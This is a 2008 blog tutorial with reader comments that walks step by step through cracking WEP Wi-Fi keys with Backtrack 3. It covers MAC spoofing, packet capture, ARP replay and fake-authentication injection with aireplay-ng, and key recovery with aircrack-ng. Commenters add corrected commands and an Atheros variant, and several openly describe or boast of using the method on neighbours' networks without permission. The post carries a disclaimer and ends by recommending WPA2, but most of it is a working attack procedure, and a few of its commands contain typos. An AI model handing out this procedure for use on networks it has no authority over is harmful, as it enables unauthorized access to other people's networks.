Aug 192008

Standard Disclaimer: This article is provided for informational purposes only. and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.


I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]


The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.


After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128” signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.


Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!

  87 Responses to “Tutorial: Cracking WEP Using Backtrack 3”

Comments (78) Pingbacks (9)
  1. Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP)

  2. or you could just buy your web access and not be fucking people over for bandwidth etc.

    • just think how many people will be doing this on there on acess point like me i cant get back on mine so my mate who works for the millitary suggested i use this get back on my network so i suggest you shut up and leave the shitty comments to your self.
      if you dont have any thing good to say dont say it.

  3. Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks

  4. There is no macconfig?
    macconfig: command not found

  5. @Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Goodluck!

  6. Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort.

  7. I personally do not worry if someone hack into my route go online. What worry me are when the intentions are further, break into my desktop or use my connection do bad things which would got me a surprise knock on the door by FBI. This is a darn good reason I remain connect with troublesome hard wired or the stick to old router b version.

  8. just wondering what are your thoughts on hiding/not broadcasting the SSID…decently secure or no?

  9. @justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations.

  10. aircrack-ng also has the PTW algorithm attack, which needs far less IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs.

  11. i have done exactly as you told my wifi chipset is Intel® PRO/Wireless 3945ABG.

    problem is after i use

    airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    i get no packets from my access point. then i use:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    after this i get many packets but like 50000 packets has only 1 IV.

    the access point im testing on is Dynalink_Datron.

    Hope someone can help

  12. Having trouble cracking wep key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs

  13. @jones hey, check out the following site for more information about Interactive Packet Replay:

    Hopefully that will give you a little more background and assist you in your efforts. Goodluck!

  14. great tutorial, scary

  15. “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]”

    If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you’ll be capturing wont be ARP packets, so the PWT method will not work for you. You’ll probably need to capture about 1,500,000 IVS before having a good chance of getting the key. Or am I mistaken?

  16. hey greeat tut just one question when i run the
    ifconfig down [wifi0] command i get error something like interface not found, but when i run airmon-ng stop [device] it says interface is wifi0 so im pretty sure its the wright interface, btw interface and device are the same thing on my machine. oh and last thing how do you get out of monitor mode?

  17. This tutorial is wonderful and worked for me!

    This line however needed the following changes to work for me.

    airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

    airodump-ng -c [channel] -w [network.out] -–bssid [bssid] [device]

  18. great tutorial! what would needed to be modified in the code to get it to work with an atheros chipset?

    i cant quite figure it out

  19. for atheros based chipsets use ath_pci in place of the numbers for the modprobe command. I also had to remove the -r to get it to load- BUT I have no idea what I’m doing yet

    Hope this helps someone

  20. this tutorial helped me alot – at was the basis for me learning bt3. However Some of the above post did not work for me. I am using an Atheros chipset, and some things had to be changed. Hope this helps some one

    modprobe ath_pci

    modprobe ipwraw


    airmon-ng stop ath0

    ifconfig wifi0 down

    macchanger –mac 00:11:22:33:44:66 wifi0

    airmon-ng start wifi0

    airodump-ng ath0
    gives available routers

    ******** cd /mnt/hda2/
    can do this to change the place to save the data
    airodump-ng -c 6 -w network.out –bssid 00:21:21:21:21:21 ath0
    collects shit

    aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e smokers suck ath0
    must play around with this to get it on the same channel
    should get:
    15:56:18 Association successful :-) (AID: 1)

    aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

    cd /mnt/hda2 <- Used this to re-locate to the directory with the file
    aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap

  21. can ill use my wifi wireless network kaart that in my laptop ??

  22. Hi there

    I am new to Wifi and linux. I have just been on amazone to order books so I can read about linux. They will be here in some days, but I can’t wait for some days.

    I im trying this tutorial and I get an error:
    bt ~ # modprobe -r iwl4965
    bt ~ # modprobe ipwraw
    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    bt ~ #

    If I run “modprobe -r iwl4965” then iwcanfic can’t find my wireless adapter and I can’t fint the interface name.

    What do I miss here or doing wrong?


  23. Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

    airmon-ng down [interface]

    what is the interface
    i all i can find is the divice name.

    i get the error ‘host name lookup failure’

    i think this is why my #data is staying at zero and beacon is at like 30000

  24. i got it all working i cant active attack, thanks for the great tutorial

  25. great tut. i have also question, or 3 problems? 1.)well after this step : aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there is a lot of read packets (100 000), but there is no ARP and ACKs requests, and data is 0, or just a few maybe 3 or 4 or 4 etc.
    so what’s problem?
    2)also, a lot of times this step don’t work: aireplay-ng -10 -a bssid -h 00:11:22:33:44:55 -e essid (device), after that there is no Authentication successful and Association successful. 3.problem is next. after this aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there is no ARP and ACKs so, with another laptop i tried to connect on the same secure network, and then started ARP and ACK..but there is no data rising, only when i tried to conect with another laptop, then data rising, but when i stop, also Data stops. and after maybe 50 000 od IV’s i can’t crack becouse that+s not enough of IV’s. have you any solution what can i do?

  26. one more thing- there is no problem with wirelles card, becouse, i tried with 5 different!!

  27. how to increase the speed of injecting packets ??
    the #data colums doesnt rise very fast after injecting packets … it would take around 4 hours to rise to about 10000 packets…how to make it risee faster ??

    i am using an intel3495 card ….

  28. im getting a msg saying

    Fwrite(packet data) failed no more space on device
    fwrite(packet filter) failed no more space on device

    while collecting packets after while it will corrupt packets collected???.. help how do i relocate where data is sent??

  29. Nice job on the tutorial. I am having some trouble with the airmon-ng and airodump-ng. The apps start but are not finding any data and seem unstable. The first few times they did find some networks. But now they don’t find anything. I have the same Centrino wireless card cited in the tutorial. Kismet is working fine and finding many networks. Any help would be appreciated. Z.

  30. Nice tutorial. Have tried this before but my Laptop’s wireless card is not compatible. Will be purchasing a new card soon as this is a neat trick to show our clients.

  31. For all of you people asking about ifconfig, it’s not

    ifconfig down [interface]


    ifconfig [interface] down

    have a good day ;)

  32. GReat tut!
    But it doesnt stop scanning the wirieless networks!

  33. thx m8, great tutorial, although I had some problems with it after few hours playing with it I succeeded in hacking WEP key of desired network…once again many thx 2 u and browncardboard how wrote version for my card, based on Atheros chipset.

  34. Godafather
    to stop the scaning just press:

    Ctrl + C keys that´s for stop any activity in that shell console window. and…

    and… Maz… Thanks for everything i didnt tried to type the modprobe´s commands. and still didnt..

  35. What Backtrack version specifcally? 3 beta? or 3 final?

    I’m asking because I downloaded 3 final from the link you provided for CD version and when it boots it’s not live, its just a terminal, and it works fine until I have to open a new shell, which I can’t or don’t know how to do.

    So in essence I’m wondering if my download is corrupt or if I downloaded the wrong version.

  36. Hi everyone, i have big question, im gonna buy PCI Wirless Card (Belkin F5D900 Wirless G+ MIMO Desktop Pci Card) but that question is card will be compatibile with BackTrack3 for Aircracking. Does anyone used that kind of card before?

    Thats card is propably on RT61 chipset. Im not sure, thx for any answers.

  37. Hi all, I’m trying to inject packets for increase de data captures (for crack the wep key), however the number ofd data never increase, I tried using the aireplay-ng command mentioned above with 3 APs (no mac filtering) and it didn’t work.
    Thanks for your help

  38. This is a decent tutorial except that there are 2 typos in the listed commands to watch out for:
    “ifconfig down [interface]”
    should be:
    “ifconfig [interface] down”

    “airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”
    should be:
    “aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”

    I am also having no luck with both methods of aireplay in getting packets.

  39. ok i understand the program and had no problem using it on my desktop but having a huge issue with it on my laptop…im guessing that my Intel(R) Wireless Wifi Link 5100 chipset is not compatible unless there is something i can do to fix it. Can someone recommend a external wireless card that i can use in my express card slot on my laptop, if so i would appreciate if you would drop me an email at

  40. Huh. I don’t know what’s going on.

    I took this screenshot at a couple hundred thousand IV’s. I let the program run further, and was at several million IV’s and aircrack would still fail to deliver me my WEP key.

    I must say, I’m pretty damn impressed with WEP encryption if it takes several days and billions of packets for Aircrack to deliver me my key.

  41. i got stuck at:
    aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 00:11:22:33:44:66 -e XXXXX ath0

    18:13:29 Waiting for beacon frame (BSSID: 00:00:00:00:00:00) on channel 1
    For the given BSSID “00:00:00:00:00:00”, there is an ESSID mismatch!
    Found ESSID “XXXX’X” vs. specified ESSID “XXXXX”
    Using the given one, double check it to be sure its correct!
    18:13:30 ath0 is on channel 1, but the AP uses channel 9

    any idea on what to do?

  42. Worked like a charm, took me less than a minute to crack my neighbors WEP, now I can cancel my Internet service. Hehehe…

  43. hi there.

    Thanks for this tutorial great job.
    However it is a great tutorial, i would have few problems, and i would really appreciate if someone could help me.

    First of all there are few type mistake in the tutorial.
    It says ifconfig down interface but the correct is ifconfig interface down.
    No im not smart ass, but it took me 2 hours to reealize thats why i got the error message:)

    On the other hand for some reason i cannot capture packages. I mean, i can see the traffic, but when i try to generate traffic there, basically nothing happen. Everything seems working fine but the packages dont seem like growing. does anyone can help me regarding this?

    I have tried this command : aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
    it is successful but when i try to use this: airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]


    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    seems like the numbers are growing but not the IVs data is keep counting paintfully slow. like 2 value up in an hour.

    It would be appreciated if someone could help me what to do and how to do.



    • hi in response to your query its not airplay-ng its aireplay-ng that could be ur problem

  44. hey people! you all are talking about BT3 wep hack but if after this step : aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there is a lot of read packets (100 000), but there is no ARP and ACKs requests, and data is 0 you will not be able to hack any wep

    Any Answer????

  45. Maz said,

    11-16-2008 in 13:26:17 at @guest
    …. You are obviously not going to crack WEP for any legitimate security purpose.


    What do you think most people do with this tutorial? 99% chance that people crack WEP for illegal purpose… I don’t understand your reasoning!

  46. everything good and helpful when the router has one name (demo)what should i do when the router has two names (one demo)?the aireplay-ng command does nothing if the router has two names!

  47. Hi commasbug,

    Can you help me with this ?
    I have no ARP. I receiving many packets and data , but the ARP is still 0


  48. Nice tutorial, very helful for a newb like me.
    Just got one problem/question. Upon cracking the key I get this:
    How do I translate this to the actual WEP key?

  49. Hmm, disregard that comment. It’s right there…. Hehehe

  50. I have the same problem as above:

    Can you help me with this ?
    I have no ARP. I receiving many packets and data , but the ARP is still 0


  51. I have an intel Pro/wireless 2915abg in a dell latitude D610 and when I typr modeprobe -r iwl2195 I get Module not found.

  52. runnin an atheros ar5b91 in a gateway T-6330u & BT3 live(CD) .. no adapter listed in BT’s wireless asst.
    assume driver issue considerin BT4 beta or VM option… any suggestions? please & thank you!

  53. i like this

  54. This is great and all but people shouldn’t be screwing other people out of bandwidth like that!

  55. i am using Atheros AR9285 802.11b/nWifi Adapter- Windows 7.. the wireless security in my location is unsecured. how can i crack the password

    • Lenx, You could start by reading the article above. Next you could learn Linux. Thirdly, if there is “unsecured wireless security” in your location as you state above, there is nothing to crack, as it’s unsecured. Remember, it’s illegal to use someone’s wireless without their permission.

      I suggest you just give up and go do something else.

    • Actually I see you are in Kuala Lumpur, Malaysia. I’m not sure what the penalties are for stealing WIFI in Malaysia, but I could guess they are extreme.

  56. hello everyone i have backtrack 4 and what i found is that you do not need to do some of the codes like putting it in monitor mode and it has to be a atheros or an Intel pro something something. it can be any wireless network adapter that you have still some codes does the same thing all you need is to download backtrack 4 from torrent or anywhere else and do what you have to do to make the evolution of hackers grow.

    • Gee, thanks for stealing my entire post word for word on your site. Fucking idiot can’t even get the images to display properly. Asshole.

  57. i am using Atheros AR9285 Wireless Network Adapter, but it is not displaying when i runned airmon-ng! – there is no wifi interfaces
    PS: i have bt3 on CD, maybe on bt4 it will work normally…
    PPS: Execute me for my Englizh

  58. Is it possible for those of us that get to the final step, that we are not recieving any data because the wireless router/AP we are accessing is actually not sending out any data? I.e there is nobody connected to it?

    For example if you are trying to connect to a company and nobody is actually using the wifi at the time you try crack it?

  59. Hi,

    this is a very easy question for you i think, but i cannot find an answer for it.

    Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?


  60. sir i m using windos xp system with virtualbox i have cd of bt-3 which i got with sky dude router now i have to burn that c\d or not.2nd i try to load but it stoped in two lines that start up n asking shall so now what i have to do,n how i will get router interface is USB2.0 mini USB so i have u this name.
    i m new in this field n i dont have too much knowlege of comp but i m learning threw friends like u.thanks.
    i hop i will get reply soon.

  61. thank uuuuuuuuuuuuuuuuu

  62. Dear sir

    pleses help me??

    Pleses send the software for spoonwep hack For WEPWPA WPA2
    and he server attach for web site software

    pleses send by email

    best regards

  63. Here is an article that explains WEP cracking thoroughly:

    I hacked my secure wireless network here’s how it’s done – TECH_BLORGE_com

    P/S: Maz, sorry for insulting.

  64. Hi,

    this is a very easy question for you i think, but i cannot find an answer for it.

    Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?


  65. How to open a new shell console in Backtrack4 on VM Ware (on Windows XP)?
    Please help!!!

  66. funciono como piña perfecto el tutorial

  67. It amazes me how many people with a very minimal knowledge of Linux and the shell want to crack wep. Sigh.

  68. i lost my wifi adapter. how can i put it back?


  69. i lost my wifi adapter after i typed stop wlan0 and down wlan0. my comp now says no intel supporte adapter found in this computer. how to enable my adapter again. pls help.



  70. thanks man ..
    i put an alfa adapter wirless in and thae program found it and did thae scan in wirless for our nighbor
    but when i made airodump for it its was didnt foud any data and packges what the proplem is

Sorry, the comment form is closed at this time.